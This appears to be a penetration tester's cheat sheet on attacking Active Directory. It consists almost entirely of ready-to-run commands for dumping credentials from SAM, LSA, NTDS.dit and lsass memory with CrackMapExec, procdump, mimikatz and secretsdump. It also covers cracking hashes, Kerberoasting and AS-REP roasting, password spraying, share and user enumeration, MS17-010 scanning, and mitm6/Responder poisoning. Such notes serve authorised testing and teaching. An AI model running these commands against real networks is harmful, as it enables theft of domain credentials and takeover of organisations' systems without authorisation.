# L5. Active Directory vulnerabilities ## 1. Starting point ```bash= cat /etc/resolv.conf nmcli dev show eth2 nslookup -type=srv _ldap._tcp.dc._msdcs.<domain> nmap -script broadcast-dhcp-discover ``` --- ## 2. Password stealing ### Crackmapexec ```bash= sudo crackmapexec smb <ip> -u '<user>' -p '<pass>' --local-auth --sam sudo crackmapexec smb <ip> -u '<user>' -p '<pass>' --local-auth --lsa sudo crackmapexec smb <ip> -u '<user>' -p '<pass>' --local-auth --ntds ``` ### Procdump :::info https://docs.microsoft.com/en-us/sysinternals/downloads/procdump ::: ```bash= procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1 ``` ### Remote procdump ```bash= python3 psexec.py <domain>/<user>:<password>@<ip> "C:\\Windows\\Temp\\procdump.exe -accepteula -ma lsass C:\\Windows\\Temp\\lsass.dmp" ``` ```bash= smbclient <domain>/<user>@<ip> use C$ cd Windows cd Temp put procdump.exe get lsass.dmp rm procdump.exe rm lsass.dmp ``` ### lsass analyse ```bash= C:\>mimikatz.exe sekurlsa::minidump <DUMPFILENAME> sekurlsa::LogonPasswords ``` ```bash= pypykatz lsa minidump <lsass.dmp> ``` ### NTDS ```bash= C:\>ntdsutil ntdsutil: activate instance ntds ntdsutil: ifm ifm: create full c:\Windows\Temp\ntds ifm: quit ntdsutil: quit ``` ```bash= ntdsutil.exe "activate instance ntfs" "ifm" "Create Full C:\Windows\Temp\ntds" quit quit ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q ``` ```bash= python3 secretsdump.py <domain>/<user>:<password>@<ip> -just-dc ``` ```bash= python3 secretsdump.py -ntds '/home/kali/Downloads/Active Directory/ntds.dit' -system '/home/kali/Downloads/registry/SYSTEM' -outputfile hashs.ntds LOCAL ``` ### Hash cracking ```bash= hashcat -m 1000 <hashes.file> <dictionary.file> --force ``` --- ## 2. *roasting ### Kerberoasting ```bash= python3 GetUserSPNs.py -request -dc-ip <ip> <domain>/<user>:'<password' ``` ```bash= hashcat -m 13100 --force <TGSs_file> <passwords_file> john --format=krb5tgs --wordlist=<passwords_file> <AS_REP_responses_file> ``` ### ASReproasting ```bash= python GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <hashcat | john> -outputfile <output_AS_REP_responses_file> ``` ```bash= hashcat -m 18200 -a 0 <AS_REP_responses_file> <passwords_file> john --wordlist=<passwords_file> <AS_REP_responses_file> ``` --- ## 3. Enumeration ### Users ```bash= enum4linux -U <dc-ip> | grep 'user:' cme smb <ip> -U <user> -p '<password>' --users ``` ### Kerberos ```bash= nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=names.txt <ip> python kerbrute.py -domain <domain> -users users.txt -passwords passwords.txt -outputfile output.txt ``` ### SMB Share ```bash= while read ip;do echo $ip; smbmap -r --depth 1 -H $ip;done < <ips_file> | tee <smbmap_without_auth_file> while read ip;do echo $ip; smbmap -u <user> -p '<password>' -d <domain> -r --depth 1 -H $ip;done < <ips_file> | tee <smbmap_user_file> ``` --- ## 4. Active Directory dumping ```bash= python ldapdomaindump.py -u '<domain>\<user>' -p <password> -o ldapdomaindump -n <ns_ip> <dc_ip> ``` ### Sysvol ```bash= smbclient -U <user> -L <ip> ///SYSVOL smbclient \\\\<ip>\\sysvol -U <user> prompt off recurse on lcd /home/kali/Downloads/sysvol mget ./* ``` ### Bloodhound ```bash= ./bloodhound.py -u <username> -p '<passoword>' -d <domain> -ns <ns_ip> -dc <dc_hostname> ``` --- ## 5. Scanning ### Runfinger ```bash= python RunFinger.py -i <ip/mask> ``` ### MS17-010 (aka WannaCry) ```bash= nmap -n -Pn -sT -v --script smb-vuln-ms17-010 -p445 --open -oA ms17-010-nmap <ip> ~/tools/wannacry/wannacry -net <ip/mask> -out <ip>-ms17-010-wanna.txt ``` ### Nmap ```bash= sudo nmap -Pn -sT --script=vulners -sV --open -oA all-ports-nmap -p 21,22,2222,23,80,8000,8001,8002,8004,8006,8007,8008,8080,8888,88,139,143,389,443,8443,9443,445,623,49152,636,1099,1433,1434,1500,2001,2010,2181,2375,2809,9043,9060,9080,9501,9502,9503,5558,5559,7873,8879,3306,3389,5800-5810,5900,5901,5432,5433,5555,5557,5666,10050,10051,7001,9000,27017,27018,50013,1521-1527,3200-3299,4786,9200,9300,5985,5986,50070,6443,8111,8500,8501,8200,8201,10250 <ip/mask> ``` ### IOXIDResolver ```bash= cat <ips-file> | xargs -I IP python IOXIDResolver.py -t IP | tee <IOXIDResolver-file> ``` ### onesixtyone ```bash= sudo ./onesixtyone -c snmp_pass.txt -o <onesixtyone-file.txt> <ip/mask> ``` --- ## 6. MiTM ### mitm6 ```bash= sudo python3 mitm6.py -i eth2 -v -d <domain> sudo python3 smbserver.py -ip <local-ip> data /tmp | tee <mitm6_file> ``` ### Responder ```bash= sudo python3 Responder.py -I eth2 -A ```